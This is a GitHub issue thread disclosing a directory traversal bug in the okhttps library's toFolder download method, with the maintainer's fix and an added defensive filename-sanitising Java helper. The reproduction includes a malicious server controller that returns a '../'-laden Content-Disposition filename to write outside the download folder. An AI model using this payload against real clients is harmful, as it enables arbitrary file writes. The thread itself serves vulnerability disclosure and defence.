A directory traversal vulnerability may occur when downloading files with the toFolder method
Closed this issue · 2 comments
arandomusernone commented
Problem description
When using the `toFolder` method to download a file to a directory, a directory traversal vulnerability occurs when the file name is obtained from the Content-Disposition header returned by the server. If the filename returned by the server contains `../`, the file will be saved to a different path.
Steps to reproduce
Client:
```java
HTTP exp = HTTP.builder()
        .baseUrl("http://127.0.0.1:8080")
        .build();
exp.sync("/a.zip")
        .get().getBody()
        .toFolder("/Users/e4stjun/Desktop/test")
        .start();
```
Server:
```java
@RestController
public class ExpController {
    @RequestMapping("/a.zip")
    public String a(HttpServletResponse response)
    {
        response.setHeader("Content-Disposition","attachment;filename=../../../../../../../../../../../../../../../../../../../../../../tmp/success");
        return "success";
    }
}
```
Versions used
- okhttps 4.0.2
- JDK20
troyzhxu commented
Received, will fix in the next version.
troyzhxu commented
Fixed in v4.0.3: https://github.com/troyzhxu/okhttps/releases/tag/v4.0.3
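
One way a client can defend against the behaviour reported in this issue, shown as an added example that is not part of the original thread and is not the okhttps v4.0.3 change: reduce the server-supplied filename to its last path segment, then confirm the resolved path is still inside the download folder. The class and method names (`SafeDownloadPath`, `baseName`, `resolveInside`) are hypothetical, and the sample filenames are constructed.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example: hypothetical helper, not okhttps code.
public class SafeDownloadPath {

    // Keep only the last path segment of a server-supplied filename.
    static String baseName(String untrusted) {
        // Treat both separators alike so Windows-style names are covered too.
        String name = untrusted.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1).trim();
        if (name.isEmpty() || name.equals(".") || name.equals("..")
                || name.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("unusable filename: " + untrusted);
        }
        return name;
    }

    // Resolve the name under folder and verify the result is still inside it.
    static Path resolveInside(Path folder, String untrusted) {
        Path root = folder.toAbsolutePath().normalize();
        Path target = root.resolve(baseName(untrusted)).normalize();
        // Second line of defence: component-wise containment check.
        if (!target.startsWith(root) || target.equals(root)) {
            throw new IllegalArgumentException("path escapes download folder: " + untrusted);
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        Path folder = Files.createTempDirectory("downloads"); // constructed sample folder
        // Constructed filename values, as they could arrive in Content-Disposition.
        String[] samples = { "a.zip", "../../../../tmp/success", "..\\..\\evil.txt", ".." };
        for (String s : samples) {
            try {
                System.out.println(s + " -> " + resolveInside(folder, s));
            } catch (IllegalArgumentException e) {
                System.out.println(s + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

With this handling, the filename from the reproduction above is saved as `success` inside the chosen folder instead of under `/tmp`.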